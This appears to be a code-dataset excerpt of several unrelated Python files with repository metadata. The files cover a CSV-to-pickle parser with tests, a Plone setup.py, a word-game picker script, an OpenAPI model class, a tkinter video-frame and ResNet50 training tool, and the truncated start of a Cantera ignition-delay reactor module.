    """Categories of CSV files handled by the parser (see header notes above)."""
    Fundamentals = 0  # PlayByPlay.csv, GameIDs.csv, BoxscoreStats.csv (scraper output)
    Enriched = 1      # PlayByPlay_enriched*.csv (enrich step output)
    Heatmap = 2       # *_heatmap.csv stat files
    All = 3           # convenience value meaning every category above
class PickleParser:
    """Converts the project's CSV data files to pickle files and back.

    All filenames are resolved relative to ``root``.  Three categories of CSV
    files are handled (see ``CSVTypes``): the fundamental scraper output, the
    enriched play-by-play files, and the per-stat heatmap files.
    """

    def __init__(self, root, verbose=False):
        self.root = root
        self.verbose = verbose
        # Canonical filename lists for each CSV category.
        self.fundamentalFiles = ['PlayByPlay.csv', 'GameIDs.csv', 'BoxscoreStats.csv']
        self.enrichedFiles = ['PlayByPlay_enriched.csv']
        # stat_filenames comes from stat_type_lookups (star import at file top).
        self.statFiles = [name + '_heatmap.csv' for name in stat_filenames.values()]

    def IterateOverPickles(self, task):
        """Walk ``root``: task 'save' serializes every CSV, 'remove' deletes every pickle."""
        for subdir, dirs, fs in os.walk(self.root):
            for f in fs:
                filename = os.path.join(subdir, f)
                if task == 'save' and filename.endswith('.csv'):
                    self.Serialize(filename)
                elif task == 'remove' and filename.endswith('.pickle'):
                    if self.verbose:
                        print("Removing file: {}".format(filename))
                    os.remove(filename)

    def SavePicklesInRoot(self):
        """Serialize every CSV found anywhere under ``root``."""
        self.IterateOverPickles('save')

    def RemovePicklesFromRoot(self):
        """Delete every pickle found anywhere under ``root``."""
        self.IterateOverPickles('remove')

    def GetAllEnrichedFiles(self):
        """Return the known enriched filenames plus any per-game enriched CSVs on disk."""
        allEnrichedFiles = list(self.enrichedFiles)
        for subdir, dirs, items in os.walk(self.root):
            for item in items:
                if re.match(r".*PlayByPlay_enriched_game[\d]+\.csv", item):
                    allEnrichedFiles.append(item)
        return allEnrichedFiles

    def GetAllHeatmapFiles(self):
        """Return the known heatmap filenames plus any heatmap CSVs found on disk."""
        allHeatmapFiles = list(self.statFiles)
        for subdir, dirs, items in os.walk(self.root):
            for item in items:
                if item.endswith("_heatmap.csv"):
                    allHeatmapFiles.append(item)
        return allHeatmapFiles

    def SaveTypesToPickles(self, types=None):
        """Re-create the pickles for the requested CSV categories.

        ``types`` may be a single CSVTypes value, a list of values, or
        None/empty (both treated as CSVTypes.All).
        """
        # None default instead of a mutable default argument; scalars become lists.
        if types is None:
            types = []
        if type(types) != list:
            types = [types]
        if types == [] or types == [CSVTypes.All.value]:
            self.SaveTypesToPickles([CSVTypes.Fundamentals.value,
                                     CSVTypes.Enriched.value,
                                     CSVTypes.Heatmap.value])
        if CSVTypes.Fundamentals.value in types:
            self.Remove(self.fundamentalFiles, '.pickle')
            self.Serialize(self.fundamentalFiles)
        if CSVTypes.Enriched.value in types:
            allEnrichedFiles = self.GetAllEnrichedFiles()
            self.Remove(allEnrichedFiles, '.pickle')
            self.Serialize(allEnrichedFiles)
        if CSVTypes.Heatmap.value in types:
            allHeatmapFiles = self.GetAllHeatmapFiles()
            self.Remove(allHeatmapFiles, '.pickle')
            self.Serialize(allHeatmapFiles)

    def RemovePicklesOfType(self, csvType, fileType):
        """Remove the files of one CSV category (or all) with the given extension."""
        if fileType != '.csv':
            fileType = '.pickle'
        if csvType == CSVTypes.All.value:
            # BUG FIX: the previous version passed the raw enum values straight
            # to Remove() as if they were filenames (a TypeError in
            # os.path.join); recurse per category instead.
            for t in (CSVTypes.Fundamentals.value,
                      CSVTypes.Enriched.value,
                      CSVTypes.Heatmap.value):
                self.RemovePicklesOfType(t, fileType)
        if csvType == CSVTypes.Fundamentals.value:
            self.Remove(self.fundamentalFiles, fileType)
        if csvType == CSVTypes.Enriched.value:
            self.Remove(self.GetAllEnrichedFiles(), fileType)
        if csvType == CSVTypes.Heatmap.value:
            self.Remove(self.GetAllHeatmapFiles(), fileType)

    def Remove(self, files=None, fileType='.pickle'):
        """For each name in ``files``, delete its counterpart with ``fileType`` extension."""
        if files is None:
            files = []
        if type(files) == str:
            files = [files]
        for csvF in files:
            csvfilename = os.path.join(self.root, csvF)
            filename = str(os.path.splitext(csvfilename)[0]) + fileType
            if os.path.isfile(filename):
                if self.verbose:
                    print("Removing file: {}".format(filename))
                os.remove(filename)

    def Serialize(self, files=None):
        """Convert each CSV in ``files`` to a same-named .pickle next to it.

        Play-by-play style files (fundamental PlayByPlay, enriched, heatmap)
        hold many rows per game and are stored as {gameID: [row, ...]};
        every other CSV is stored as {first_column: {column_name: value}}.
        """
        if files is None:
            files = []
        if type(files) == str:
            files = [files]
        for csvF in files:
            csvfilename = os.path.join(self.root, csvF)
            if not csvfilename.endswith('.csv') or not os.path.isfile(csvfilename):
                continue
            # Delete an old pickle file of the same name if it exists.
            filename = str(os.path.splitext(csvfilename)[0]) + '.pickle'
            if os.path.isfile(filename):
                os.remove(filename)
            x = {}
            header_flag = True
            keys = []
            last_gameID = -1
            manualAddID = "PlayByPlay.pickle" in filename or \
                os.path.basename(csvfilename) in self.GetAllEnrichedFiles() or \
                os.path.basename(csvfilename) in self.GetAllHeatmapFiles()
            with open(csvfilename, 'rt') as f:
                reader = csv.reader(f, delimiter=',')
                for line in reader:
                    if header_flag:
                        # First row holds the column names.
                        header_flag = False
                        keys = line
                    elif manualAddID:
                        if line[0] != last_gameID:  # new gameID starts a new row list
                            last_gameID = line[0]
                            x[line[0]] = []
                        x[line[0]].append(line[1:])
                    else:
                        x[line[0]] = {}
                        for i in range(1, len(line)):
                            x[line[0]][keys[i]] = line[i]
            if self.verbose:
                print("Dumping {} data, hold on".format(filename))
            with open(filename, 'wb') as f:
                pickle.dump(x, f, pickle.HIGHEST_PROTOCOL)

    def LoadPickle(self, file=''):
        """Load and return the dict stored in ``file`` (empty dict if missing)."""
        filename = os.path.join(self.root, file)
        if not os.path.isfile(filename) or not filename.endswith('.pickle'):
            if self.verbose:
                print("Unable to find pickle file {}".format(filename))
            return dict()
        if self.verbose:
            print("Loading data from {}, hold on".format(filename))
        # Context manager so the file handle is always closed (the old version
        # leaked the handle returned by open()).
        with open(filename, "rb") as f:
            return pickle.load(f)
if __name__=='__main__':
    # Init: parser rooted at the data directory, quiet mode.
    pickleParser = PickleParser('../data', False)

    #################################################################
    ######################### Tests + demos #########################
    #################################################################
    t = Tester()

    # Load empty pickle (missing file should yield an empty dict)
    print("Test 1")
    t.Assert("Load empty pickle", pickleParser.LoadPickle('') == {})

    # Remove empty pickle (no-op; should not raise)
    print("Test 2")
    pickleParser.Remove('')
    t.Assert("Delete empty pickle", True)

    # Create and remove a file (csv and pickle)
    print("Test 3")
    tempFileName = os.path.join(pickleParser.root, 'test.csv')
    with open(tempFileName,'w') as f: f.write('')
    pickleParser.Remove(tempFileName, '.csv')
    t.Assert("Delete csv", not os.path.isfile(tempFileName))
    tempFileName = os.path.join(pickleParser.root, 'test.pickle')
    with open(tempFileName,'w') as f: f.write('')
    pickleParser.Remove(tempFileName)
    t.Assert("Delete pickle", not os.path.isfile(tempFileName))

    # Load == Serialize for a file (round-trip through one heatmap CSV)
    print("Test 4")
    serializeTestFile = 'turnovers_avg_heatmap'
    initialRead = pickleParser.LoadPickle(serializeTestFile + '.pickle')
    pickleParser.Serialize(serializeTestFile + '.csv')
    rewriteAndRead = pickleParser.LoadPickle(serializeTestFile + '.pickle')
    t.Assert("Seralize == Load for pickle reading", initialRead == rewriteAndRead)

    # Delete stats pickles
    print("Test 5")
    pickleParser.RemovePicklesOfType(CSVTypes.Heatmap.value, '.pickle')
    t.Assert("Delete stats pickles",
             all(not os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.statFiles))

    # Delete enriched pickle
    print("Test 6")
    pickleParser.RemovePicklesOfType(CSVTypes.Enriched.value, '.pickle')
    t.Assert("Delete enriched pickles",
             all(not os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.GetAllEnrichedFiles()))

    # Delete fundamental pickles
    print("Test 7")
    pickleParser.RemovePicklesOfType(CSVTypes.Fundamentals.value, '.pickle')
    t.Assert("Delete fundamental pickles",
             all(not os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.fundamentalFiles))

    # Pickles created during fundamentals serialization
    print("Test 8")
    pickleParser.SaveTypesToPickles(CSVTypes.Fundamentals.value)
    t.Assert("Pickles created during fundamentals serialization",
             all(os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.fundamentalFiles))

    # Pickles created during enriched serialization
    print("Test 9")
    pickleParser.SaveTypesToPickles(CSVTypes.Enriched.value)
    t.Assert("Pickles created during enriched serialization",
             all(os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.GetAllEnrichedFiles()))

    # Pickles created during stat serialization
    print("Test 10")
    pickleParser.SaveTypesToPickles(CSVTypes.Heatmap.value)
    t.Assert("Pickles created during stat serialization",
             all(os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle')) for x in pickleParser.GetAllHeatmapFiles()))

    # Delete all pickles from dir
    print("Test 11")
    pickleParser.RemovePicklesFromRoot()
    t.Assert("Delete all pickles from dir",
             all(not os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle'))
                 for x in pickleParser.statFiles + pickleParser.enrichedFiles + pickleParser.fundamentalFiles))

    # All pickles created from dir
    print("Test 12")
    pickleParser.SavePicklesInRoot()
    t.Assert("All pickles created from dir",
             all(os.path.isfile(os.path.join(pickleParser.root, str(os.path.splitext(x)[0]) + '.pickle'))
                 for x in pickleParser.GetAllHeatmapFiles() + pickleParser.GetAllEnrichedFiles() + pickleParser.fundamentalFiles))

    print('\n')
    t.ShowResults()
    print("\nNote: There is a chance this failed because of setup. \n" + \
          "I'm very lazy and don't want to create files for the sole purpose of testing," + \
          "so just make sure to copy the files from ../_backup_data into ../data" + \
          "and see if it still works then.")
    #################################################################
    #################################################################
{
"api_name": "sys.path.insert",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sys.path.insert",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_numbe... |
42632745572 | from setuptools import setup, find_packages
version = '0.1'


def _read(filename):
    """Return the full text of *filename*, closing the handle properly.

    The previous version used bare ``open(...).read()`` three times, leaking
    the file handles (and emitting ResourceWarnings under -W default).
    """
    with open(filename) as f:
        return f.read()


# Long description shown on PyPI: README + contributors list + changelog.
long_description = (
    _read('README.rst')
    + '\n' +
    'Contributors\n'
    '============\n'
    + '\n' +
    _read('CONTRIBUTORS.rst')
    + '\n' +
    _read('CHANGES.rst')
    + '\n')

setup(
    name='imio.dms.ws',
    version=version,
    description="",
    long_description=long_description,
    classifiers=[
        "Environment :: Web Environment",
        "Framework :: Plone",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2.7",
        "Topic :: Software Development :: Libraries :: Python Modules",
    ],
    keywords='',
    author='',
    author_email='',
    url='https://github.com/IMIO/imio.dms.ws',
    license='gpl',
    packages=find_packages(exclude=['ez_setup']),
    namespace_packages=['imio', 'imio.dms'],
    include_package_data=True,
    zip_safe=False,
    install_requires=[
        'Plone',
        'imio.wsrequest.core',
        'plone.api',
        'setuptools',
    ],
    extras_require={'test': ['plone.app.testing']},
    entry_points="""
    # -*- Entry points: -*-
    """,
)
| IMIO/imio.dms.ws | setup.py | setup.py | py | 1,189 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 34,
"usage_type": "call"
}
] |
4513078370 | import json
import random
# Interactive triage tool: shows unreviewed words one at a time and sorts them
# into the candidate pool or the rejected list.
words = []
unavailableWordIndices = set()  # indices already used, pooled, queued, or rejected
rejectedWordIndices = set()

# words.js is a JS file containing an array literal; slice out everything from
# the first '[' to the last ',' and close the bracket to get valid JSON.
with open("words.js", "r") as f:
    s = f.read()
s = s[s.find("["):s.rfind(",")] + "]"
words = json.loads(s)

# Words already used in past puzzles.
with open("history.json", "r") as f:
    history = json.load(f)
for item in history:
    index = item.get("index")
    if index is not None:
        unavailableWordIndices.add(index)

# Words already waiting in the candidate pool.
with open("pool.json", "r") as f:
    pool = json.load(f)
unavailableWordIndices.update(pool)

# Words scheduled as upcoming solutions.
with open("solution.json", "r") as f:
    solution = json.load(f)
for item in solution:
    index = item.get("index")
    if index is not None:
        unavailableWordIndices.add(index)

# Previously rejected words.
with open("rejected.json") as f:
    rejected = json.load(f)
rejectedWordIndices.update(rejected)
unavailableWordIndices.update(rejectedWordIndices)

# Everything not yet seen, in random presentation order.
availableWordIndices = [i for i in range(
    len(words)) if i not in unavailableWordIndices]
random.shuffle(availableWordIndices)

# First pass: 'a' accepts into the pool, Enter rejects, 'q' stops reviewing.
poolAdditions = []
for index in availableWordIndices:
    print(words[index])
    quit = False
    while True:
        c = input("Verdict: ")
        if c == "a":
            poolAdditions.append(index)
            break
        elif c == "":
            rejectedWordIndices.add(index)
            break
        elif c == "q":
            quit = True
            break
    if quit:
        break

# Second pass: review the accepted words; entering space-separated list
# positions demotes those entries to rejected, Enter confirms the list.
reviewed = False
while not reviewed:
    print("\n=====================================\n")
    print("Review additions: ")
    for i in range(len(poolAdditions)):
        index = poolAdditions[i]
        p = "X" if index in rejectedWordIndices else i
        print(p, ": ", words[index])
    amendments = input("Amendments: ")
    if amendments == "":
        reviewed = True
    else:
        try:
            ais = [int(s) for s in amendments.split(' ')]
            for ai in ais:
                rejectedWordIndices.add(poolAdditions[ai])
        except:
            print("Invalid input")
            continue

# Persist the updated pool and (sorted) rejected list.
pool.extend([i for i in poolAdditions if i not in rejectedWordIndices])
with open("pool.json", "w") as f:
    json.dump(pool, f, indent=2)
orderedRejected = sorted(rejectedWordIndices)
with open("rejected.json", "w") as f:
    json.dump(orderedRejected, f, indent=2)
| mkacz91/slowle | picker.py | picker.py | py | 2,289 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "json.loads",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 25,
... |
72809319784 | from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.reference_type import ReferenceType
from ..types import UNSET, Unset
if TYPE_CHECKING:
from ..models.key import Key
T = TypeVar("T", bound="Reference")
# NOTE(review): this model follows the openapi-python-client generated-code
# template -- prefer regenerating from the API spec over hand-editing.
@attr.s(auto_attribs=True)
class Reference:
    """AAS Reference model: a typed chain of keys, optionally with a referred
    semantic id.

    Attributes:
        referred_semantic_id (Union[Unset, Reference]):
        type (Union[Unset, ReferenceType]):
        keys (Union[Unset, List['Key']]):
    """

    referred_semantic_id: Union[Unset, "Reference"] = UNSET
    type: Union[Unset, ReferenceType] = UNSET
    keys: Union[Unset, List["Key"]] = UNSET
    # Catch-all for JSON properties not declared above.
    additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)

    def to_dict(self) -> Dict[str, Any]:
        """Serialize to a plain dict, omitting fields that are UNSET."""
        referred_semantic_id: Union[Unset, Dict[str, Any]] = UNSET
        if not isinstance(self.referred_semantic_id, Unset):
            referred_semantic_id = self.referred_semantic_id.to_dict()
        type: Union[Unset, str] = UNSET
        if not isinstance(self.type, Unset):
            type = self.type.value
        keys: Union[Unset, List[Dict[str, Any]]] = UNSET
        if not isinstance(self.keys, Unset):
            keys = []
            for keys_item_data in self.keys:
                keys_item = keys_item_data.to_dict()
                keys.append(keys_item)
        field_dict: Dict[str, Any] = {}
        field_dict.update(self.additional_properties)
        field_dict.update({})
        if referred_semantic_id is not UNSET:
            field_dict["referredSemanticId"] = referred_semantic_id
        if type is not UNSET:
            field_dict["type"] = type
        if keys is not UNSET:
            field_dict["keys"] = keys
        return field_dict

    @classmethod
    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
        """Deserialize from a plain dict; unknown keys go to additional_properties."""
        from ..models.key import Key

        d = src_dict.copy()
        _referred_semantic_id = d.pop("referredSemanticId", UNSET)
        referred_semantic_id: Union[Unset, Reference]
        if isinstance(_referred_semantic_id, Unset):
            referred_semantic_id = UNSET
        else:
            referred_semantic_id = Reference.from_dict(_referred_semantic_id)
        _type = d.pop("type", UNSET)
        type: Union[Unset, ReferenceType]
        if isinstance(_type, Unset):
            type = UNSET
        else:
            type = ReferenceType(_type)
        keys = []
        _keys = d.pop("keys", UNSET)
        for keys_item_data in _keys or []:
            keys_item = Key.from_dict(keys_item_data)
            keys.append(keys_item)
        reference = cls(
            referred_semantic_id=referred_semantic_id,
            type=type,
            keys=keys,
        )
        # Whatever remains in d was not a declared field.
        reference.additional_properties = d
        return reference

    @property
    def additional_keys(self) -> List[str]:
        return list(self.additional_properties.keys())

    def __getitem__(self, key: str) -> Any:
        return self.additional_properties[key]

    def __setitem__(self, key: str, value: Any) -> None:
        self.additional_properties[key] = value

    def __delitem__(self, key: str) -> None:
        del self.additional_properties[key]

    def __contains__(self, key: str) -> bool:
        return key in self.additional_properties
| sdm4fzi/aas2openapi | ba-syx-submodel-repository-client/ba_syx_submodel_repository_client/models/reference.py | reference.py | py | 3,280 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "typing.TypeVar",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "typing.Union",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "types.Unset",
"li... |
12316087861 | import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
import os
import glob
import cv2
import math
import csv
import re
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from tensorflow.keras.applications.imagenet_utils import preprocess_input, decode_predictions
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.resnet50 import ResNet50
from keras.utils import np_utils
from skimage.transform import resize
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers import Dense, InputLayer, Dropout
from tensorflow.keras.models import Sequential
def load_train_tab(tab_train, root):
    """Populate the "Train Model" tab with its widgets and wire up the
    browse / split / train workflow.

    Args:
        tab_train: parent container widget for this tab.
        root: the application's top-level Tk window (used for popups/updates).

    NOTE(review): the chosen folder is stored in the module-level global
    ``selected_directory``; frame_split/begin_training will raise NameError
    if called before a directory has been browsed — TODO confirm intended.
    """
    def browse_directory():
        """Ask the user for a folder and list the video files it contains."""
        global selected_directory
        filepath = filedialog.askdirectory(title="Select a directory")
        if filepath:
            print("Selected file:", filepath)
            selected_directory = filepath # Save the directory name to the global variable
            directory_entry.delete(0, tk.END)
            directory_entry.insert(0, filepath)
            # Update the video files list
            video_files.config(state="normal") # Set the state to normal before inserting text
            video_files.delete(1.0, tk.END)
            for file in os.listdir(filepath):
                if file.endswith(".mp4") or file.endswith(".avi") or file.endswith(".mkv"):
                    video_files.insert(tk.END, file + "\n")
            video_files.config(state="disabled") # Set the state back to disabled after inserting text
    def frame_split():
        """Extract ~1 frame/second from every .mp4 in the selected folder into
        <dir>/train/frames/ and write a labeling template frames.csv.

        NOTE(review): only *.mp4 is globbed here although browse_directory also
        lists .avi/.mkv — confirm whether those formats should be split too.
        """
        # Create a progress bar popup window
        progress_window = tk.Toplevel(root)
        progress_window.title("Splitting Videos")
        progress_label = ttk.Label(progress_window, text="Splitting video into frames...")
        progress_label.pack(padx=10, pady=(10, 0))
        progress = ttk.Progressbar(progress_window, mode="indeterminate", length=300)
        progress.pack(padx=10, pady=(5, 10))
        progress.start(10)
        progress_window.update()
        #check if train/frames path exists, if not, create it
        if os.path.exists(selected_directory + "/train/frames/") == False:
            print("/train/frames folder does not exist. Creating...")
            os.makedirs(selected_directory + "/train/frames/")
        else:
            print("train/frames folder already exists")
        #capture video files in chosen directory
        count = 0
        cap = [cv2.VideoCapture(videoFile) for videoFile in glob.glob(os.path.join(selected_directory, "*.mp4"))] # capturing the video from the given path
        #split the frames from each video then output to train/frames folder
        for i in cap:
            print(str(i))
            frameRate = i.get(5)  # property 5 is CAP_PROP_FPS
            while (i.isOpened()):
                frameID = i.get(1)  # property 1 is CAP_PROP_POS_FRAMES
                ret, frame = i.read()
                if (ret != True):
                    break
                # keep one frame per second of video (every floor(fps) frames)
                if (frameID % math.floor(frameRate) == 0):
                    filename = selected_directory + "/train/frames/frame%d.jpg" % (count); count +=1
                    cv2.imwrite(filename, frame)
            i.release()
        #create the excel file from split frames
        print("Creating excel file for classification...")
        header = ['Image_ID', 'Class']
        data = []
        for i in os.listdir(selected_directory + "/train/frames"):
            data.append(str(i))
        # sort numerically by the digits embedded in each file name
        data.sort(key=lambda f: int(re.sub('\D', '', f)))
        data2 = []
        for i in data:
            data2.append([i])
        with open(selected_directory + '/train/frames.csv', 'w', encoding='UTF8', newline='') as f:
            writer = csv.writer(f)
            writer.writerow(header)
            writer.writerows(data2)
        print("Done! Please label frames accordingly in 'frames.csv' ")
        # Close the progress bar window
        progress.stop()
        progress_window.destroy()
        # Show a new popup window that says "frame split complete"
        complete_window = tk.Toplevel(root)
        complete_window.title("Complete")
        complete_label = ttk.Label(complete_window, text="Frame splitting complete. \nYour training frames are located in /train/frames/ in your selected directory. \nPlease update your excel file located in the /train/ folder with the necessary labels")
        complete_label.pack(padx=10, pady=(10, 0))
        ok_button = ttk.Button(complete_window, text="OK", command=complete_window.destroy)
        ok_button.pack(padx=10, pady=(5, 10))
        # Update the main window
        root.update()
    def begin_training():
        """Train a ResNet50-feature + dense-head classifier from the labeled
        frames.csv and save the model to <dir>/train/model.

        Blocks the UI thread while keras trains; the indeterminate progress
        bar will not animate during model.fit — TODO consider a worker thread.
        """
        # Create a progress bar popup window
        progress_window = tk.Toplevel(root)
        progress_window.title("Splitting Videos")
        progress_label = ttk.Label(progress_window, text="Training model...")
        progress_label.pack(padx=10, pady=(10, 0))
        progress = ttk.Progressbar(progress_window, mode="indeterminate", length=300)
        progress.pack(padx=10, pady=(5, 10))
        progress.start(10)
        progress_window.update()
        #load training excel file
        data = pd.read_csv(selected_directory + '/train/frames.csv')
        #count number of areas created in excel file:
        cnt = 0
        visited = []
        for i in range (0, len(data['Class'])):
            if data['Class'][i] not in visited:
                visited.append(data['Class'][i])
                cnt+=1
        X = [ ] # creating an empty array
        for img_name in data.Image_ID:
            img = plt.imread(selected_directory + '/train/frames/' + img_name)
            X.append(img) # storing each image in array X
        X = np.array(X)
        y = data.Class
        dummy_y = np_utils.to_categorical(y)  # one-hot encode the labels
        image = []
        for i in range(0,X.shape[0]):
            a = resize(X[i], preserve_range=True, output_shape=(224,224)).astype(int) # reshaping to 224*224*3
            image.append(a)
        X = np.array(image)
        X = preprocess_input(X, mode='caffe')  # ResNet50 expects caffe-style preprocessing
        X_train, X_valid, y_train, y_valid = train_test_split(X, dummy_y, test_size=0.3, random_state=42)
        # frozen ImageNet backbone used purely as a feature extractor
        base_model = ResNet50(weights='imagenet', include_top=False, input_shape=(224, 224, 3))
        X_train = base_model.predict(X_train)
        X_valid = base_model.predict(X_valid)
        X_train.shape, X_valid.shape
        X_train = X_train.reshape(X_train.shape[0], 7*7*2048) # converting to 1-D
        X_valid = X_valid.reshape(X_valid.shape[0], 7*7*2048)
        train = X_train/X_train.max() # centering the data
        X_valid = X_valid/X_train.max()
        model = Sequential()
        model.add(InputLayer((7*7*2048,))) # input layer
        model.add(Dense(units=2048, activation='sigmoid')) # hidden layer
        model.add(Dropout(0.5)) # adding dropout
        model.add(Dense(units=1024, activation='sigmoid')) # hidden layer
        model.add(Dropout(0.5)) # adding dropout
        model.add(Dense(units=512, activation='sigmoid')) # hidden layer
        model.add(Dropout(0.5)) # adding dropout
        model.add(Dense(units=256, activation='sigmoid')) # hidden layer
        model.add(Dropout(0.5)) # adding dropout
        model.add(Dense(cnt, activation='softmax')) # output layer
        model.summary()
        model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
        model.fit(train, y_train, epochs=15, validation_data=(X_valid, y_valid))
        model.save(selected_directory + '/train/model')
        # Close the progress bar window
        progress.stop()
        progress_window.destroy()
        # Show a new popup window that says "model training complete"
        complete_window = tk.Toplevel(root)
        complete_window.title("Complete")
        complete_label = ttk.Label(complete_window, text="Model training complete. Model has been saved to /train/model/.\nYou may begin classification of new videos in the classify tab")
        complete_label.pack(padx=10, pady=(10, 0))
        ok_button = ttk.Button(complete_window, text="OK", command=complete_window.destroy)
        ok_button.pack(padx=10, pady=(5, 10))
        # Update the main window
        root.update()
    # Add description text above the browse button
    description_label = ttk.Label(tab_train, text="Select user video folder:")
    description_label.pack(padx=10, pady=(10, 0))
    # Create a frame to hold the directory entry and browse button
    entry_browse_frame = ttk.Frame(tab_train)
    entry_browse_frame.pack(padx=10, pady=(5, 10))
    # Add an empty text box for manual directory input
    directory_entry = ttk.Entry(entry_browse_frame, width=50)
    directory_entry.pack(side="left")
    # Add a browse button to the "Train Model" tab
    browse_button = ttk.Button(entry_browse_frame, text="Browse", command=browse_directory)
    browse_button.pack(side="left", padx=(10, 0))
    # Create a text box to show a list of video files in the chosen directory
    video_files = tk.Text(tab_train, wrap="none", width=50, height=10, state="normal")
    video_files.pack(padx=10, pady=(5, 10))
    # Add split text description above the split button
    split_description_label = ttk.Label(tab_train, text="Split videos into frames and output to a train folder:")
    split_description_label.pack(padx=10, pady=(10, 0))
    # Add a split button to the "Train Model" tab
    split_button = ttk.Button(tab_train, text="Split", command=frame_split)
    split_button.pack(padx=10, pady=(5, 10))
    #Add train text description above train button
    train_description_label = ttk.Label(tab_train, text="Begin training model (please make sure your excel file is properly filled out)")
    train_description_label.pack(padx=10, pady=(10, 0))
    # Add a train button to the "Train Model" tab
    train_button = ttk.Button(tab_train, text="Train", command=begin_training)
    train_button.pack(padx=10, pady=(5, 10))
| NoahSCode/EDUSIM | app_train.py | app_train.py | py | 10,305 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tkinter.filedialog.askdirectory",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "tkinter.filedialog",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "tkinter.END",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "t... |
35056080810 | import cantera as ct
import numpy as np
from typing import List, Tuple
from scipy import integrate
from copy import copy
"""
Present a simple implementation of IDT reactors and the
cantera implementation of a LFS reactor.
Each model can be called as:
IDT, all_conditions = idt_reactor.solve(gas, flag='T', temp_rise=400)
IDT, all_conditions = idt_reactor.solve(gas, path_to_save=dir_to_save, phi_for_file_name=phi_value)
WARNINGS: idt_reactor uses only the Temperarure rise. The species peak is still under developement.
LFS, all_conditions = lfs_reactor.solve(gas)
LFS, all_conditions = lfs_reactor.solve(gas, path_to_save=dir_to_save, phi_for_file_name=phi_value)
The saved file will be named as:
<model_type>_<TEMP in K>_<PRESSURE in atm>_<PHI, default is 1.0>.csv
The first line will contain the propertie value (IDT or LFS).
The second line will be a header containing specifics and the conditions.
The rest of the file will present the values in a csv format.
"""
# --------------------------------------------------------------------------------------------------
# utils for save
def save_solution_to_file(file_path: str,
                          model_type: str,
                          model_value: float,
                          header: str,
                          states: np.ndarray,) -> None:
    """Write the reactor solution to a csv-style file.

    The first line carries the model property (``MODEL_<specific>=<value>``),
    e.g. ``MODEL_IDT_T_400`` for an IDT run or ``MODEL_LFS`` for a flame
    speed run.  The second line is *header*, followed by one comma-joined
    row per row of *states*.  No trailing newline is appended.
    """
    lines = [f"MODEL_{model_type}={model_value}", header]
    n_rows, n_cols = states.shape
    for row in range(n_rows):
        lines.append(",".join(str(states[row, col]) for col in range(n_cols)))
    with open(file_path, 'w') as f:
        f.write("\n".join(lines))
def create_solution_file_name(model_type: str, temp: float, press: float, phi: float) -> str:
    """Create the output file name from the initial state.

    Format: ``<model_type>_<temp>_<press>_<phi>.csv`` with temp in Kelvin
    (1 decimal) and press converted from Pa to atm (2 decimals).
    If no phi is provided (``None``), 1.0 is used as the default.

    Bug fix: the original tested ``if phi:``, so a legitimate ``phi == 0.0``
    was silently replaced by the default "1.0"; the check is now ``is None``.
    """
    phi_str = "1.0" if phi is None else f"{phi:.1f}"
    return f"{model_type}_{temp:.1f}_{press/ct.one_atm:.2f}_{phi_str}.csv"
# --------------------------------------------------------------------------------------------------
# IDT implementation
class ConstantMassPressureODE:
    """Implement the 0D, constant mass, constant pressure reactor.

    State vector layout: ``y[0]`` is temperature [K], ``y[1:]`` are the
    species mass fractions.  Pressure is frozen at the value the gas had
    when this object was constructed.
    """
    def __init__(self, gas: ct.Solution) -> None:
        self.gas: ct.Solution = gas
        self._pressure: float = gas.P  # held constant for the whole integration
    def __call__(self, t: float, y: np.ndarray) -> np.ndarray:
        """Return the RHS of the ODE system (dT/dt, dY/dt). See Turns to understand."""
        # Set the gas conditions
        if y[0] <= 0:
            raise ValueError(f"Negative value found for temperature.")
        self.gas.set_unnormalized_mass_fractions(y[1:])
        self.gas.TP = y[0], self._pressure
        # calculates all the values
        rho = self.gas.density
        wdot = self.gas.net_production_rates
        # Constant-pressure energy equation: dT/dt = -sum(h_i * wdot_i) / (rho * cp)
        dTdt = - (np.dot(self.gas.partial_molar_enthalpies, wdot) / (rho * self.gas.cp))
        dYdt = wdot * self.gas.molecular_weights / rho
        return np.hstack((dTdt, dYdt))
class IDTReactor:
    """
    Class implementation of an 0D reactor to obtain the IDT (ignition
    delay time) value, integrated with scipy's lsoda solver.
    """
    def __init__(self, rtol: float = 10**-6, atol: float = 10**-9, n_iter: int = 10000) -> None:
